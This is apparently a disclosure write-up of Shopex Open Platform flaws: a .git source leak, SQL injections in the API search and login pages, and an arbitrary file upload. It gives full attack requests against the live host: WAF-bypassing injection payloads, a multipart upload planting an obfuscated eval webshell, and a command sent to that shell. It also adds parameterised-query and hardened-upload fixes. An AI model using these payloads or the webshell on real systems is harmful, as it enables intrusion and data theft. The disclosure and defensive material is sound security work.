Shopex Open Platform SQL injection and Getshell
SQL Injection.
BBScan found a .git information leak:
http://open.shopex.cn/.git/
Use rip-git.pl to download the source code.
Auditing the source turns up an SQL injection:
open.shopex.cn\core\application\controllers\docs.php:
/**
 * API search list page
 *
 * @access public
 * @return void
 */
public function api_search($category_id)
{
    $this->data['navigations'][] = array('name' => 'Development document', 'url' => '');
    $this->data['navigations'][] = array('name' => 'API document', 'url' => site_url('/docs/api_list/' . $category_id));
    $platform_id    = isset($_GET['platform_id']) ? $_GET['platform_id'] : 0;
    $docs_keyword   = isset($_GET['docs_keyword']) ? trim(urldecode($_GET['docs_keyword'])) : '';
    $method_type_id = isset($_GET['method_type_id']) ? $_GET['method_type_id'] : 0;

    /* change the layout of the development document page */
    $this->layout->layout('doc_details');

    /* load the API list model and get the API list data */
    $this->load->model('method_type_model');
    $api_list_data_temp = $this->method_type_model->get_api_list_all();
    foreach ($api_list_data_temp as $k => $v) {
        $api_list_data[$v['id']] = $v;
    }
    $this->data['api_list_data'] = $api_list_data;

    /* supported platform list */
    $this->load->model('platform_model');
    $platform_list = $this->platform_model->get_platform_list();
    $this->data['platform_list'] = $platform_list;

    /* condition filtering: user input is concatenated straight into the WHERE clause */
    $conditions = '1 = 1';
    if ($platform_id > 0) {
        $conditions .= ' AND pm.platform_id = ' . $platform_id;
    }
    if ($docs_keyword != '') {
        $conditions .= ' AND (m.name like "%' . $docs_keyword . '%" OR m.introduction like "%' . $docs_keyword . '%")';
    }

    /* filter shown on the left */
    $this->load->model('method_model');
    $filter_method_list = $this->method_model->get_method_search_list($conditions); // interface list
    $method_type_id_array = array();
    foreach ($filter_method_list as $k => $v) {
        $method_type_id_array[] = $v['method_type_id'];
    }
    if ($method_type_id > 0) {
        $conditions .= ' AND mthm.method_type_id = ' . $method_type_id;
    }

    /* load the API model */
    $this->load->model('method_model');
    $method_list_temp = $this->method_model->get_method_search_list($conditions); // interface list
    foreach ($method_list_temp as $k => $v) {
        $temp = isset($api_list_data[$v['method_type_id']]) ? $api_list_data[$v['method_type_id']]['name'] : 'temp';
        $method_list_group[$temp][] = $v;
    }
    $this->data['method_list_group']    = $method_list_group;
    $this->data['method_type_id_array'] = $method_type_id_array;
    $this->data['docs_keyword']         = $docs_keyword;
    $this->data['platform_id']          = $platform_id;
    $this->data['category_id']          = $category_id;
    $this->data['method_type_id']       = $method_type_id; // current list ID
    $this->layout->view('docs/api_search', $this->data);
}
Three parameters are injectable:
platform_id, docs_keyword, method_type_id
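The root cause is that all three values are spliced into the WHERE string as text. The following is an added example, not Shopex's code, showing the same three filters rebuilt on CodeIgniter's query bindings (`$this->db->query($sql, $binds)` with `?` placeholders), so the values are quoted by the driver instead of by string concatenation. The model name and the `$this->db` context come from the page; the FROM/JOIN clause and table names are my assumptions about the schema, and the LIKE escaping assumes MySQL's default backslash escape character.

```php
<?php
// Added example (not the Shopex code base): api_search() conditions rebuilt
// with CodeIgniter query bindings. Table names and the join are assumptions.
class Method_model extends CI_Model
{
    /**
     * Build the WHERE clause as (sql, binds) instead of one concatenated string.
     * Every '?' is replaced by $this->db->query() with an escaped, quoted value.
     */
    public function build_search_conditions($platform_id, $docs_keyword, $method_type_id)
    {
        $where = array('1 = 1');
        $binds = array();

        // Integer columns: cast first, so anything non-numeric becomes 0 and is skipped.
        $platform_id    = (int) $platform_id;
        $method_type_id = (int) $method_type_id;
        if ($platform_id > 0) {
            $where[] = 'pm.platform_id = ?';
            $binds[] = $platform_id;
        }
        if ($method_type_id > 0) {
            $where[] = 'mthm.method_type_id = ?';
            $binds[] = $method_type_id;
        }

        // LIKE pattern: escape the wildcard characters inside the keyword so it
        // cannot become a "match everything" pattern; the bind itself is quoted
        // by the driver, so quote characters in the keyword stay data.
        $docs_keyword = trim((string) $docs_keyword);
        if ($docs_keyword !== '') {
            $pattern = '%' . addcslashes($docs_keyword, '\\%_') . '%';
            $where[] = '(m.name LIKE ? OR m.introduction LIKE ?)';
            $binds[] = $pattern;
            $binds[] = $pattern;
        }
        return array(implode(' AND ', $where), $binds);
    }

    public function get_method_search_list_safe($platform_id, $docs_keyword, $method_type_id)
    {
        list($where_sql, $binds) = $this->build_search_conditions($platform_id, $docs_keyword, $method_type_id);
        // FROM/JOIN clause is assumed for illustration; only the aliases pm, m and
        // mthm are taken from the original conditions.
        $sql = 'SELECT m.*, mthm.method_type_id FROM method m '
             . 'JOIN method_type_has_method mthm ON mthm.method_id = m.id '
             . 'JOIN platform_method pm ON pm.method_id = m.id '
             . 'WHERE ' . $where_sql;
        return $this->db->query($sql, $binds)->result_array();
    }
}
```

For the two numeric parameters the `(int)` cast alone already closes the injection; the keyword needs the bind because it is a free-text LIKE pattern. The controller then calls `get_method_search_list_safe()` with the raw `$_GET` values rather than building `$conditions` itself.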
Searching shows that the following reports had already been submitted:
WooYun: Shopex SQL Injection somewhere on the Open Platform
WooYun: an SQL injection vulnerability exists on Shopex's official platform.
WooYun: ShopEx injection to a substation
The vulnerability was not fixed; a WAF was put in front of it instead.
The application is built on the CI (CodeIgniter) framework, which by default strips invalid UTF-8 bytes from request parameters, so inserting a %80 byte inside a keyword bypasses the WAF.
http://open.shopex.cn/docs/api_search/1?platform_id=1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23
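The bypass works because the WAF matches its signatures on the raw bytes while CodeIgniter's Input class first drops bytes that are not valid UTF-8 (the default filtering mentioned above), so the two sides see different strings. The following is an added example, not code from the page or from CodeIgniter: `strip_invalid_utf8()` is my own equivalent of that cleaning step, and `looks_like_sqli()` shows why a filter has to inspect the same normalised bytes the application will run. The signature list and the sample value are constructed from the request above.

```php
<?php
// Added example (not Shopex's or CodeIgniter's code). Re-implements the
// "drop invalid UTF-8 bytes" step the application applies to GET/POST values,
// so a filter can compare what it matched against what the app actually saw.
function strip_invalid_utf8($s)
{
    // Keep every well-formed UTF-8 sequence (ASCII, 2-, 3- and 4-byte forms,
    // excluding overlongs and surrogates); any other single byte is dropped.
    $re = '/[\x00-\x7F]'
        . '|[\xC2-\xDF][\x80-\xBF]'
        . '|\xE0[\xA0-\xBF][\x80-\xBF]'
        . '|[\xE1-\xEC\xEE\xEF][\x80-\xBF]{2}'
        . '|\xED[\x80-\x9F][\x80-\xBF]'
        . '|\xF0[\x90-\xBF][\x80-\xBF]{2}'
        . '|[\xF1-\xF3][\x80-\xBF]{3}'
        . '|\xF4[\x80-\x8F][\x80-\xBF]{2}'
        . '|(.)/s';                      // group 1 only matches a stray byte
    return preg_replace_callback($re, function ($m) {
        return isset($m[1]) ? '' : $m[0];
    }, $s);
}

// Returns the first matching signature, or false. $normalise selects whether
// the check runs on the raw decoded bytes (what the WAF did) or on the cleaned
// string (what the application executed).
function looks_like_sqli($raw_param, array $signatures, $normalise)
{
    $value = rawurldecode($raw_param);
    if ($normalise) {
        $value = strip_invalid_utf8($value);
    }
    $value = strtolower($value);
    foreach ($signatures as $sig) {
        if (strpos($value, $sig) !== false) {
            return $sig;
        }
    }
    return false;
}

// Constructed sample: the platform_id value from the request above, as it
// arrives on the wire, and two signatures a WAF would reasonably carry.
$sample     = '1/extractvalue(1,concat%20(0x7e,us%80er(),0x3a,ver%80sion()))%23';
$signatures = array('user()', 'version()');

var_dump(looks_like_sqli($sample, $signatures, false)); // raw bytes: "us\x80er()" does not contain "user()"
var_dump(looks_like_sqli($sample, $signatures, true));  // after cleaning the application sees "user()"
```

The point for defenders is the one the Solution section makes: a signature filter that does not reproduce the application's decoding order is a speed bump, not a fix, and the injection itself has to be removed in the code.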
Continuing through the code, there is also an arbitrary file upload:
open.shopex.cn\core\application\controllers\uploads.php:
class Uploads extends CI_Controller
{
    /**
     * Home page image upload
     *
     * @access public
     */
    public function home_img()
    {
        if (empty($_FILES['image'])) {
            $this->_return_msg('fail', 'The format of the uploaded content is incorrect!');
        }
        // only the client-supplied MIME type is checked
        if (substr($_FILES['image']['type'], 0, 5) != 'image') {
            $this->_return_msg('fail', 'Check whether the image is uploaded!');
        }
        $image_name     = $_FILES['image']['name'];
        $image_name_exp = explode('.', $image_name);
        // the suffix is taken from the client file name without any allowlist
        $image_name     = date('YmdHis') . mt_rand(0, 1) . '.' . $image_name_exp[1];
        $uploadfile     = FCPATH . 'uploads/home_img/' . $image_name;
        move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);
        $data['img'] = base_url('/uploads/home_img/' . $image_name);
        $this->_return_msg('succ', 'success', $data);
    }
    ...
The way PHP parses multipart/form-data can be used to get past the WAF and upload a PHP shell:
POST /index.php/uploads/home_img HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 341
Content-Type: multipart/form-data; boundary=----,xxoo

------,xxoo
Content-Disposition: form-data; name="image"; filename="1.jpg"
Content-Type: image/png

------
Content-Disposition: form-data; name="image"; filename="1.php"
Content-Type: image/png

<script language="php">@preg_replace('/./e','@'.str_rot13('riny').'(bas'.'e64_decode($_POST[c]))', 'x');</script>
------------,xxoo--
Shell:
http://open.shopex.cn/uploads/home_img/201512122130440.php
POST /uploads/home_img/201512122130440.php HTTP/1.1
User-Agent: curl/7.33.0
Host: open.shopex.cn
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

c=ZWNobyBgaWQ7cHdkO2xhc3QgLTIwYDs=
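Both the upload handler itself and the multipart trick above fail for the same reason: the only checks are the client-supplied `type` field and whatever follows the first dot in the client's file name, and the file keeps whatever suffix it arrives with. The following is an added example, not Shopex's code, of a replacement `home_img()` that trusts nothing the client said about the file. It assumes the same controller context as the original (`$this->_return_msg()`, `FCPATH`, `base_url()`); the extension allowlist, the random naming and the 0644 mode are my choices.

```php
<?php
// Added example, not the Shopex code base: home_img() rebuilt so that the
// stored file's name, suffix and content are all decided server-side.
class Uploads extends CI_Controller
{
    /** Allowed suffixes and the image type getimagesize() must report for each. */
    private $allowed = array(
        'jpg' => IMAGETYPE_JPEG,
        'png' => IMAGETYPE_PNG,
        'gif' => IMAGETYPE_GIF,
    );

    public function home_img()
    {
        // An authorisation check on the caller belongs here; the original had none.
        if (empty($_FILES['image']) || $_FILES['image']['error'] !== UPLOAD_ERR_OK) {
            $this->_return_msg('fail', 'No file uploaded.');
            return;
        }
        $tmp = $_FILES['image']['tmp_name'];
        if (!is_uploaded_file($tmp)) {
            $this->_return_msg('fail', 'Invalid upload.');
            return;
        }

        // Take the LAST extension, lower-cased, and accept it only from the allowlist.
        // The original used the segment after the first dot and accepted anything.
        $ext = strtolower(pathinfo($_FILES['image']['name'], PATHINFO_EXTENSION));
        if (!isset($this->allowed[$ext])) {
            $this->_return_msg('fail', 'Only jpg, png and gif images are accepted.');
            return;
        }

        // Check the bytes, not $_FILES['image']['type'], which the client chooses.
        // With two "image" parts in one request PHP keeps the last one, so this
        // check runs on exactly the file that would be stored.
        $info = @getimagesize($tmp);
        if ($info === false || $info[2] !== $this->allowed[$ext]) {
            $this->_return_msg('fail', 'File content is not a ' . $ext . ' image.');
            return;
        }

        // Server-generated name: nothing from the client's file name survives.
        $image_name = bin2hex(openssl_random_pseudo_bytes(16)) . '.' . $ext;
        $dir        = FCPATH . 'uploads/home_img/';
        if (!move_uploaded_file($tmp, $dir . $image_name)) {
            $this->_return_msg('fail', 'Could not store the file.');
            return;
        }
        chmod($dir . $image_name, 0644);   // readable by the web server, never executable

        $data['img'] = base_url('/uploads/home_img/' . $image_name);
        $this->_return_msg('succ', 'success', $data);
    }
}
```

The remaining layer is the web server: `uploads/` should be served as static files with the PHP handler disabled for that directory, so that even a file that slips through the checks is returned as bytes rather than executed.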
There is also an SQL injection:
POST /index.php/passport/passport/login HTTP/1.1
Host: 122.144.135.142
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=368fe31461cc0ba9a3e38c0334145b35; CNZZDATA3868185=cnzz_eid%3D1466070748-1449902718-%26ntime%3D1449902718
Content-Length: 131

biz_id=&entid=')or updatexml(1,co%80ncat(0x7e,us%80er(),ver%80sion()),1)#&pwd=xx&auth_code=cqac&subOk=%E7%99%BB%E5%BD%95&logOk=true
Solution:
Delete the .git directory or deny access to it;
Fix the SQL injections in the code rather than relying on the WAF;
Restrict the upload function to an allowlist of suffixes and add user permission checks.